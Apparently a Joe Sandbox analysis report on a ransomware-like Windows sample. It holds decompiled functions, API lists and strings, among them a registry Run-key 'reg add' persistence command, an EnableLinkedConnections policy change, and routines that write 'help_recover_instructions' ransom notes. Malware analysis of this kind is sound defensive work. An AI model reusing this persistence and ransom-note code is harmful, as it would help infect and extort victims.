														_t94 =  &_v6868;
														 *_t94 =  &(_v6868->Internal);
														__eflags =  *_t94;
														goto L42;
													}
													__eflags = _t274 - 2;
													if(_t274 != 2) {
														goto L42;
													}
													goto L38;
												}
												__eflags = _t274 - 2;
												if(_t274 != 2) {
													goto L36;
												}
												goto L35;
											}
											_t341 =  *_t319;
											_t355 = _v6880;
											__eflags = _t341 - 0xa;
											_v6888 = 0 | _t341 == 0x0000000a;
											_t282 =  *_t355 + _t352;
											__eflags =  *(_t282 + 0x38);
											if( *(_t282 + 0x38) == 0) {
												_t284 = E0042D435(_t341);
												__eflags = _t284;
												if(_t284 == 0) {
													_push(1);
													_push(_t319);
													L25:
													_push( &_v6848);
													_t286 = E0042D9C9();
													_t362 = _t362 + 0xc;
													__eflags = _t286 - 0xffffffff;
													if(_t286 == 0xffffffff) {
														goto L86;
													}
													L26:
													_t319 =  &(_t319[0]);
													_v6852 = _v6852 + 1;
													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
													__eflags = _t355;
													if(_t355 == 0) {
														goto L86;
													}
													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
													__eflags = _t293;
													if(_t293 == 0) {
														goto L85;
													}
													_t325 = _v6868;
													_v6860 = _v6852 + _v6868;
													__eflags = _v6872 - _t355;
													if(_v6872 < _t355) {
														goto L86;
													}
													__eflags = _v6888;
													if(_v6888 == 0) {
														goto L42;
													}
													_v16 = 0xd;
													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L85;
													}
													__eflags = _v6872 - 1;
													if(_v6872 < 1) {
														goto L86;
													}
													_v6868 =  &(_v6868->Internal);
													_v6860 = _v6860 + 1;
													goto L42;
												}
												__eflags = _v6864 - _t319 + _a12 - 1;
												if(_v6864 - _t319 + _a12 <= 1) {
													_t350 =  *_t319;
													_v6860 = _v6860 + 1;
													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
													goto L86;
												}
												_t304 = E0042D9C9( &_v6848, _t319, 2);
												_t362 = _t362 + 0xc;
												__eflags = _t304 - 0xffffffff;
												if(_t304 == 0xffffffff) {
													goto L86;
												}
												_t319 =  &(_t319[0]);
												_v6852 = _v6852 + 1;
												goto L26;
											}
											_t350 =  *((intOrPtr*)(_t282 + 0x34));
											_v16 =  *((intOrPtr*)(_t282 + 0x34));
											_v15 = _t341;
											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
											_push(2);
											_push( &_v16);
											goto L25;
											L42:
											__eflags = _v6852 - _a12;
										} while (_v6852 < _a12);
										goto L86;
									}
									__eflags = _v6853;
									if(_v6853 == 0) {
										goto L46;
									}
									goto L15;
								}
							}
							 *(E00427138(__eflags)) =  *_t307 & 0x00000000;
							 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
							_t225 = E004270D3();
							goto L95;
						}
						__eflags = _t322 - 1;
						if(_t322 != 1) {
							goto L8;
						}
						goto L6;
					}
					 *(E00427138(__eflags)) = 0;
					 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
					_t220 = E004270D3() | 0xffffffff;
					goto L98;
				}
				_t220 = 0;
				goto L98;
			}

0x0042c826
0x0042c826
0x0042c830
0x0042c835
0x0042c83c
0x0042c83f
0x0042c843
0x0042c847
0x0042c849
0x0042c84f
0x0042c855
0x0042c85e
0x0042c867
0x0042c869
0x0042c891
0x0042c892
0x0042c899
0x0042c89e
0x0042c8a7
0x0042c8a9
0x0042c8af
0x0042c8b5
0x0042c8b8
0x0042c8bf
0x0042c8c2
0x0042c8c4
0x0042c8c7
0x0042c8e6
0x0042c8e6
0x0042c8eb
0x0042c8f4
0x0042c8f9
0x0042c8f9
0x0042c8fd
0x0042c903
0x0042c905
0x0042cba4
0x0042cba4
0x0042cba4
0x00000000
0x0042c90b
0x0042c90d
0x0042c912
0x00000000
0x00000000
0x0042c918
0x0042c922
0x0042c934
0x0042c936
0x0042c93c
0x0042c93e
0x0042c940
0x0042cba6
0x0042cba6
0x0042cba8
0x0042cbad
0x0042ce68
0x0042ce6e
0x0042ce70
0x0042ce87
0x0042ce8d
0x0042ce93
0x0042ce93
0x0042ce9a
0x0042cf0e
0x0042cf0e
0x0042cf14
0x0042cf14
0x0042cf15
0x0042cf22
0x0042cf22
0x0042ce9c
0x0042ce9c
0x0042cea3
0x0042ced2
0x0042ceda
0x0042cedf
0x0042cef0
0x0042cef5
0x0042cefb
0x0042cf00
0x0042cf00
0x0042cf03
0x0042cf03
0x00000000
0x0042cf03
0x0042cee7
0x0042ceea
0x00000000
0x00000000
0x0042ceec
0x00000000
0x0042ceec
0x0042cea7
0x0042cea8
0x0042ceae
0x0042ceca
0x0042ceb0
0x0042ceb5
0x0042cebb
0x0042cec0
0x0042cec0
0x00000000
0x0042ceae
0x0042ce78
0x0042ce7f
0x00000000
0x0042ce7f
0x0042cbb3
0x0042cbba
0x0042cbc0
0x0042cc6e
0x0042cc75
0x0042cd4e
0x0042cd54
0x0042cd57
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cd5d
0x0042cd5d
0x0042cd63
0x0042cd6a
0x0042cd6a
0x0042cd72
0x0042cd78
0x0042cd79
0x0042cd79
0x0042cd7c
0x00000000
0x00000000
0x0042cd84
0x0042cd87
0x0042cd8d
0x0042cd8f
0x0042cd92
0x0042cd96
0x0042cd97
0x0042cd9a
0x0042cd9c
0x0042cd9c
0x0042cd9c
0x0042cd9c
0x0042cda2
0x0042cda8
0x0042cdab
0x0042cdad
0x0042cdad
0x0042cdb9
0x0042cdd1
0x0042cde6
0x0042cde8
0x0042cdea
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cdf0
0x0042cdf0
0x0042ce11
0x0042ce17
0x0042ce19
0x00000000
0x00000000
0x0042ce1b
0x0042ce21
0x0042ce23
0x00000000
0x00000000
0x0042ce33
0x0042ce33
0x0042ce35
0x00000000
0x00000000
0x00000000
0x0042ce35
0x0042ce2d
0x00000000
0x0042ce37
0x0042ce3d
0x0042ce43
0x0042ce49
0x0042ce49
0x00000000
0x0042ce52
0x0042cc7b
0x0042cc81
0x0042cc84
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cc8a
0x0042cc8a
0x0042cc8a
0x0042cc93
0x0042cc93
0x0042cc9b
0x0042cca1
0x0042cca2
0x0042cca2
0x0042cca5
0x00000000
0x00000000
0x0042cca7
0x0042ccaa
0x0042ccac
0x0042ccae
0x0042ccb4
0x0042ccb7
0x0042ccb9
0x0042ccc1
0x0042ccc2
0x0042ccc5
0x0042cccb
0x0042cccd
0x0042cccd
0x0042cccd
0x0042cccd
0x0042ccd3
0x0042ccd9
0x0042ccdc
0x0042ccde
0x0042ccde
0x0042ccf2
0x0042cd10
0x0042cd16
0x0042cd18
0x00000000
0x00000000
0x0042cd1e
0x0042cd24
0x0042cd2a
0x0042cd2c
0x00000000
0x00000000
0x0042cd3a
0x0042cd3a
0x00000000
0x0042cd43
0x0042cbc6
0x0042cbcc
0x0042cbcf
0x00000000
0x00000000
0x00000000
0x00000000
0x0042cbd5
0x0042cbd5
0x0042cbd7
0x0042cbd9
0x0042cbd9
0x0042cbdf
0x0042cbe5
0x0042cbe5
0x0042cbe8
0x00000000
0x00000000
0x0042cbea
0x0042cbec
0x0042cbed
0x0042cbee
0x0042cbf4
0x0042cbf7
0x0042cbf9
0x0042cbff
0x0042cc02
0x0042cc03
0x0042cc03
0x0042cc03
0x0042cc04
0x0042cc06
0x0042cc07
0x0042cc08
0x0042cc08
0x0042cc18
0x0042cc36
0x0042cc3c
0x0042cc3e
0x00000000
0x00000000
0x0042cc44
0x0042cc4a
0x0042cc50
0x0042cc52
0x00000000
0x00000000
0x0042cc60
0x0042cc60
0x00000000
0x0042cc69
0x0042c946
0x0042c948
0x0042c956
0x0042c956
0x0042c95c
0x0042c962
0x0042c96a
0x0042c970
0x0042c973
0x00000000
0x00000000
0x0042c979
0x0042c97f
0x0042c97f
0x0042c985
0x0042c987
0x0042caf4
0x0042caf6
0x0042cafc
0x0042cafc
0x0042cb01
0x0042cb04
0x0042cb07
0x0042cb0a
0x0042cb0a
0x0042cb0a
0x0042cb11
0x0042cb17
0x0042cb1d
0x0042cb1d
0x0042cb1f
0x0042cb25
0x0042cb2b
0x0042cb30
0x0042cb31
0x0042cb38
0x00000000
0x00000000
0x0042cb3e
0x0042cb45
0x0042cb4c
0x00000000
0x00000000
0x0042cb50
0x0042cb52
0x0042cb58
0x0042cb5d
0x0042cb5e
0x0042cb65
0x00000000
0x00000000
0x0042cb6b
0x0042cb71
0x0042cb71
0x0042cb71
0x00000000
0x0042cb71
0x0042cb21
0x0042cb23
0x00000000
0x00000000
0x00000000
0x0042cb23
0x0042caf8
0x0042cafa
0x00000000
0x00000000
0x00000000
0x0042cafa
0x0042c98d
0x0042c98f
0x0042c997
0x0042c99d
0x0042c9a5
0x0042c9a7
0x0042c9ab
0x0042c9c6
0x0042c9cc
0x0042c9ce
0x0042ca0a
0x0042ca0c
0x0042ca0d
0x0042ca13
0x0042ca14
0x0042ca19
0x0042ca1c
0x0042ca1f
0x00000000
0x00000000
0x0042ca25
0x0042ca3f
0x0042ca40
0x0042ca4c
0x0042ca4e
0x0042ca50
0x00000000
0x00000000
0x0042ca6f
0x0042ca75
0x0042ca77
0x00000000
0x00000000
0x0042ca83
0x0042ca8b
0x0042ca91
0x0042ca97
0x00000000
0x00000000
0x0042ca9d
0x0042caa4
0x00000000
0x00000000
0x0042cac1
0x0042cac8
0x0042cace
0x0042cad0
0x00000000
0x00000000
0x0042cad6
0x0042cadd
0x00000000
0x00000000
0x0042cae3
0x0042cae9
0x00000000
0x0042cae9
0x0042c9de
0x0042c9e0
0x0042cb8d
0x0042cb8f
0x0042cb95
0x0042cb9b
0x00000000
0x0042cb9b
0x0042c9f0
0x0042c9f5
0x0042c9f8
0x0042c9fb
0x00000000
0x00000000
0x0042ca01
0x0042ca02
0x00000000
0x0042ca02
0x0042c9ad
0x0042c9b0
0x0042c9b3
0x0042c9b6
0x0042c9ba
0x0042c9bf
0x00000000
0x0042cb77
0x0042cb7a
0x0042cb7a
0x00000000
0x0042cb86
0x0042c94a
0x0042c950
0x00000000
0x00000000
0x00000000
0x0042c950
0x0042c905
0x0042c8ce
0x0042c8d6
0x0042c8dc
0x00000000
0x0042c8dc
0x0042c8ba
0x0042c8bd
0x00000000
0x00000000
0x00000000
0x0042c8bd
0x0042c870
0x0042c877
0x0042c882
0x00000000
0x0042c882
0x0042c860
0x00000000

APIs

GetConsoleMode.KERNEL32(00000000,?), ref: 0042C936
GetConsoleCP.KERNEL32 ref: 0042C956
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00425BFA,00000005,00000000,00000000), ref: 0042CA46
WriteFile.KERNEL32(00000000,00425BFA,00000000,?,00000000), ref: 0042CA6F
WriteFile.KERNEL32(00000000,00425BFA,00000001,?,00000000), ref: 0042CAC8

Part of subcall function 0042F6BE: WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,00000000,00000000), ref: 0042F6F0

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CC36
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CD10
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042CDE0
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042CE11
GetLastError.KERNEL32 ref: 0042CE27
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CE68
GetLastError.KERNEL32(?,0042CFB8,00000000,00425BFA,?,0043C368,00000010,00426F28,00425BFA,00000000,00000001,00441D28,00000000,?), ref: 0042CE87

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Part of subcall function 0042C6B7: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0042C6F9
Part of subcall function 0042C6B7: GetLastError.KERNEL32(?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001,00000000,?,0042CFB8,00000000,00425BFA,?,0043C368,00000010), ref: 0042C706

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FD80, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71

C-Code - Quality: 96%

			E0041FD80(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v8202;
				char _v8204;
				void* _v8208;
				char _v8212;
				signed int _t17;
				signed int _t45;

				E0042E220(0x2010);
				_t17 =  *0x43f054; // 0xd46ffb00
				_v8 = _t17 ^ _t45;
				_v8204 = 0;
				E0042D0A0( &_v8202, 0, 0x1ffe);
				_v8212 = 1;
				RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0, 0, 0x20006, 0,  &_v8208, 0);
				RegSetValueExW(_v8208, L"EnableLinkedConnections", 0, 4,  &_v8212, 4);
				RegFlushKey(_v8208);
				RegCloseKey(_v8208);
				E00425ACD( &_v8204, 0x1000, L"reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v game342 /t REG_SZ  /d \"");
				E00425ACD( &_v8204, 0x1000, "C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe");
				E00425ACD( &_v8204, 0x1000, L"\" /f");
				return E004256FE(E0041EEE0( &_v8204), __ebx, _v8 ^ _t45,  &_v8204, __edi, __esi);
			}

0x0041fd8a
0x0041fd8f
0x0041fd96
0x0041fda8
0x0041fdaf
0x0041fdd7
0x0041fde1
0x0041fe00
0x0041fe0d
0x0041fe1a
0x0041fe31
0x0041fe4a
0x0041fe63
0x0041fe87

APIs

RegCreateKeyExA.ADVAPI32 ref: 0041FDE1
RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
RegFlushKey.ADVAPI32(?), ref: 0041FE0D
RegCloseKey.ADVAPI32(?), ref: 0041FE1A

Part of subcall function 0041EEE0: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041EF55
Part of subcall function 0041EEE0: CloseHandle.KERNEL32(?), ref: 0041EF65
Part of subcall function 0041EEE0: CloseHandle.KERNEL32(?), ref: 0041EF6B
Part of subcall function 0041EEE0: Sleep.KERNEL32(000003E8), ref: 0041EF72

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d ", xrefs: 0041FE20
EnableLinkedConnections, xrefs: 0041FDFA
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0041FDCD
" /f, xrefs: 0041FE52
C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, xrefs: 0041FE39

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00420280, Relevance: 15.1, APIs: 10, Instructions: 79

C-Code - Quality: 100%

			E00420280(intOrPtr* __eax) {
				struct HDC__* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				void* __edi;
				void* __esi;
				void* _t32;
				struct HDC__* _t35;
				struct HDC__* _t36;
				intOrPtr* _t37;

				_t37 = __eax;
				_t35 = GetDC(0);
				 *_t37 = 0;
				 *((intOrPtr*)(_t37 + 4)) = 0;
				 *(_t37 + 8) = 0x47e;
				_v8 = _t35;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				 *(_t37 + 0xc) = 0x3e8;
				_t32 = CreateCompatibleBitmap(_t35, 0x47e, 0x3e8);
				if(_t32 != 0) {
					_t36 = CreateCompatibleDC(_t35);
					if(_t36 != 0) {
						_v12 = SelectObject(_t36, _t32);
						SetBkMode(_t36, 1);
						SetTextColor(_t36, 0xffffff);
						E0041FE90(_t36,  &_v28);
						SelectObject(_t36, _v12);
						DeleteDC(_t36);
						_v12 = 1;
					}
					_t35 = _v8;
				}
				ReleaseDC(0, _t35);
				if(_v12 != 0 || _t32 == 0) {
					return _t32;
				} else {
					DeleteObject(_t32);
					return 0;
				}
			}

0x0042028d
0x00420295
0x004202a4
0x004202a8
0x004202ac
0x004202b0
0x004202b3
0x004202b6
0x004202b9
0x004202bc
0x004202bf
0x004202c8
0x004202cc
0x004202d5
0x004202d9
0x004202e6
0x004202e9
0x004202f5
0x004202fe
0x00420308
0x0042030f
0x00420315
0x00420315
0x0042031c
0x0042031c
0x00420322
0x0042032c
0x0042034a
0x00420332
0x00420333
0x00420341
0x00420341

APIs

GetDC.USER32(00000000), ref: 0042028F
CreateCompatibleBitmap.GDI32(00000000,0000047E,000003E8), ref: 004202C2
CreateCompatibleDC.GDI32(00000000), ref: 004202CF
SelectObject.GDI32(00000000,00000000), ref: 004202DD
SetBkMode.GDI32(00000000,00000001), ref: 004202E9
SetTextColor.GDI32(00000000,00FFFFFF), ref: 004202F5

Part of subcall function 0041FE90: CreateFontW.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000020,Tahoma), ref: 0041FEB5
Part of subcall function 0041FE90: SelectObject.GDI32(00000000,00000000), ref: 0041FEBF
Part of subcall function 0041FE90: DrawTextA.USER32(00000000,00462918,000000FF,?,00000400), ref: 0041FEE0
Part of subcall function 0041FE90: DrawTextA.USER32(00000000,00462918,000000FF,?,00000010), ref: 0041FEF1
Part of subcall function 0041FE90: GetStockObject.GDI32(0000000D), ref: 0041FEF9
Part of subcall function 0041FE90: SelectObject.GDI32(00000000,00000000), ref: 0041FF01
Part of subcall function 0041FE90: DeleteObject.GDI32(00000000), ref: 0041FF08

SelectObject.GDI32(00000000,00000000), ref: 00420308
DeleteDC.GDI32(00000000), ref: 0042030F
ReleaseDC.USER32(00000000,00000000), ref: 00420322
DeleteObject.GDI32(00000000), ref: 00420333

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 00413500, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 185

C-Code - Quality: 83%

			E00413500(wchar_t* _a4) {
				signed int _v8;
				char _v8198;
				short _v8200;
				long _v8204;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				wchar_t* _t30;
				intOrPtr* _t38;
				intOrPtr* _t41;
				wchar_t* _t45;
				intOrPtr* _t47;
				intOrPtr* _t50;
				intOrPtr* _t51;
				long _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;
				signed int _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;

				E0042E220(0x2008);
				_t24 =  *0x43f054; // 0xd46ffb00
				_v8 = _t24 ^ _t68;
				_t45 = _a4;
				_v8204 = 0;
				_v8200 = 0;
				E0042D0A0( &_v8198, 0, 0x1ffe);
				_t70 = _t69 + 0xc;
				_t47 = 0x476238;
				_t28 = _t45;
				while(1) {
					_t57 =  *_t28;
					if(_t57 !=  *_t47) {
						break;
					}
					if(_t57 == 0) {
						L5:
						_t28 = 0;
					} else {
						_t57 = _t28[0];
						_t7 = _t47 + 2; // 0x0
						if(_t57 !=  *_t7) {
							break;
						} else {
							_t28 =  &(_t28[1]);
							_t47 = _t47 + 4;
							if(_t57 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
					}
					L7:
					if(_t28 != 0) {
						_t50 = 0x470238;
						_t28 = _t45;
						while(1) {
							_t57 =  *_t28;
							if(_t57 !=  *_t50) {
								break;
							}
							if(_t57 == 0) {
								L13:
								_t28 = 0;
							} else {
								_t57 = _t28[0];
								_t9 = _t50 + 2; // 0x0
								if(_t57 !=  *_t9) {
									break;
								} else {
									_t28 =  &(_t28[1]);
									_t50 = _t50 + 4;
									if(_t57 != 0) {
										continue;
									} else {
										goto L13;
									}
								}
							}
							L15:
							if(_t28 != 0) {
								_t51 = 0x47e238;
								_t28 = _t45;
								while(1) {
									_t57 =  *_t28;
									if(_t57 !=  *_t51) {
										break;
									}
									if(_t57 == 0) {
										L21:
										_t28 = 0;
									} else {
										_t57 = _t28[0];
										_t11 = _t51 + 2; // 0x0
										if(_t57 !=  *_t11) {
											break;
										} else {
											_t28 =  &(_t28[1]);
											_t51 = _t51 + 4;
											if(_t57 != 0) {
												continue;
											} else {
												goto L21;
											}
										}
									}
									L23:
									if(_t28 != 0) {
										_push(_t64);
										_t28 = wcsstr(_t45, 0x472238);
										_t71 = _t70 + 8;
										if(_t28 == 0) {
											_t30 = 0x474238;
											_t12 =  &(_t30[0]); // 0x47423a
											_t57 = _t12;
											do {
												_t52 =  *_t30;
												_t30 =  &(_t30[0]);
											} while (_t52 != 0);
											if(_t30 == _t57) {
												L29:
												_push(_t62);
												_push(0x442000);
												_push(L"help_recover_instructions");
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.txt", _t45);
												_t66 = E004134D0( &_v8200);
												_t72 = _t71 + 0x18;
												if(_t66 != 0xffffffff) {
													_t41 = 0x462918;
													_t15 = _t41 + 1; // 0x462919
													_t61 = _t15;
													do {
														_t55 =  *_t41;
														_t41 = _t41 + 1;
													} while (_t55 != 0);
													E00414330(_t61, _t66, 0x462918, _t41 - _t61,  &_v8204);
													_t72 = _t72 + 0x10;
													CloseHandle(_t66);
												}
												_push(0x442000);
												_push(L"help_recover_instructions");
												_t57 = 0x1000;
												E00414300(0x1000,  &_v8200, L"%s\\%s+%s.html", _t45);
												_t67 = CreateFileW( &_v8200, 0x40000000, 0, 0, 4, 0x80, 0);
												if(_t67 != 0xffffffff) {
													_t38 = 0x4665a8;
													_t19 = _t38 + 1; // 0x4665a9
													_t57 = _t19;
													do {
														_t53 =  *_t38;
														_t38 = _t38 + 1;
													} while (_t53 != 0);
													E00414330(_t57, _t67, 0x4665a8, _t38 - _t57,  &_v8204);
													_t28 = CloseHandle(_t67);
												}
												_pop(_t62);
											} else {
												_t28 = wcsstr(_t45, 0x474238);
												_t71 = _t71 + 8;
												if(_t28 == 0) {
													goto L29;
												}
											}
										}
										_pop(_t64);
									}
									goto L39;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L23;
							}
							goto L39;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L15;
					}
					L39:
					return E004256FE(_t28, _t45, _v8 ^ _t68, _t57, _t62, _t64);
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L7;
			}

0x0041350a
0x0041350f
0x00413516
0x0041351a
0x0041352c
0x00413536
0x0041353d
0x00413542
0x00413545
0x0041354a
0x00413550
0x00413550
0x00413556
0x00000000
0x00000000
0x0041355b
0x00413572
0x00413572
0x0041355d
0x0041355d
0x00413561
0x00413565
0x00000000
0x00413567
0x00413567
0x0041356a
0x00413570
0x00000000
0x00000000
0x00000000
0x00000000
0x00413570
0x00413565
0x0041357b
0x0041357d
0x00413583
0x00413588
0x00413590
0x00413590
0x00413596
0x00000000
0x00000000
0x0041359b
0x004135b2
0x004135b2
0x0041359d
0x0041359d
0x004135a1
0x004135a5
0x00000000
0x004135a7
0x004135a7
0x004135aa
0x004135b0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135b0
0x004135a5
0x004135bb
0x004135bd
0x004135c3
0x004135c8
0x004135d0
0x004135d0
0x004135d6
0x00000000
0x00000000
0x004135db
0x004135f2
0x004135f2
0x004135dd
0x004135dd
0x004135e1
0x004135e5
0x00000000
0x004135e7
0x004135e7
0x004135ea
0x004135f0
0x00000000
0x00000000
0x00000000
0x00000000
0x004135f0
0x004135e5
0x004135fb
0x004135fd
0x00413603
0x00413610
0x00413612
0x00413617
0x0041361d
0x00413622
0x00413622
0x00413625
0x00413625
0x00413628
0x0041362b
0x00413634
0x00413649
0x00413649
0x0041364a
0x0041364f
0x00413666
0x0041367d
0x0041367f
0x00413685
0x00413687
0x0041368c
0x0041368c
0x00413690
0x00413690
0x00413692
0x00413693
0x004136a7
0x004136ac
0x004136b0
0x004136b0
0x004136b2
0x004136b7
0x004136c9
0x004136ce
0x004136f5
0x004136fa
0x004136fc
0x00413701
0x00413701
0x00413704
0x00413704
0x00413706
0x00413707
0x0041371b
0x00413724
0x00413724
0x00413726
0x00413636
0x0041363c
0x0041363e
0x00413643
0x00000000
0x00000000
0x00413643
0x00413634
0x00413727
0x00413727
0x00000000
0x004135fd
0x004135f6
0x004135f8
0x00000000
0x004135f8
0x00000000
0x004135bd
0x004135b6
0x004135b8
0x00000000
0x004135b8
0x00413728
0x00413736
0x00413736
0x00413576
0x00413578
0x00000000

APIs

wcsstr.NTDLL ref: 00413610
wcsstr.NTDLL ref: 0041363C
CloseHandle.KERNEL32(00000000), ref: 004136B0
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 004136EF
CloseHandle.KERNEL32(00000000), ref: 00413724

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

%s\%s+%s.txt, xrefs: 0041365B
%s\%s+%s.html, xrefs: 004136C3
help_recover_instructions, xrefs: 0041364F, 004136B7

Memory Dump Source

Source File: 00000000.00000001.218181254.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041FD80, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71

C-Code - Quality: 96%

			E0041FD80(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v8202;
				char _v8204;
				void* _v8208;
				char _v8212;
				signed int _t17;
				signed int _t45;

				E0042E220(0x2010);
				_t17 =  *0x43f054; // 0xd46ffb00
				_v8 = _t17 ^ _t45;
				_v8204 = 0;
				E0042D0A0( &_v8202, 0, 0x1ffe);
				_v8212 = 1;
				RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0, 0, 0x20006, 0,  &_v8208, 0);
				RegSetValueExW(_v8208, L"EnableLinkedConnections", 0, 4,  &_v8212, 4);
				RegFlushKey(_v8208);
				RegCloseKey(_v8208);
				E00425ACD( &_v8204, 0x1000, L"reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v game342 /t REG_SZ  /d \"");
				E00425ACD( &_v8204, 0x1000, 0x46c238);
				E00425ACD( &_v8204, 0x1000, L"\" /f");
				return E004256FE(E0041EEE0( &_v8204), __ebx, _v8 ^ _t45,  &_v8204, __edi, __esi);
			}

0x0041fd8a
0x0041fd8f
0x0041fd96
0x0041fda8
0x0041fdaf
0x0041fdd7
0x0041fde1
0x0041fe00
0x0041fe0d
0x0041fe1a
0x0041fe31
0x0041fe4a
0x0041fe63
0x0041fe87

APIs

RegCreateKeyExA.ADVAPI32 ref: 0041FDE1
RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
RegFlushKey.ADVAPI32(?), ref: 0041FE0D
RegCloseKey.ADVAPI32(?), ref: 0041FE1A

Part of subcall function 0041EEE0: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041EF55
Part of subcall function 0041EEE0: CloseHandle.KERNEL32(?), ref: 0041EF65
Part of subcall function 0041EEE0: CloseHandle.KERNEL32(?), ref: 0041EF6B
Part of subcall function 0041EEE0: Sleep.KERNEL32(000003E8), ref: 0041EF72

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

EnableLinkedConnections, xrefs: 0041FDFA
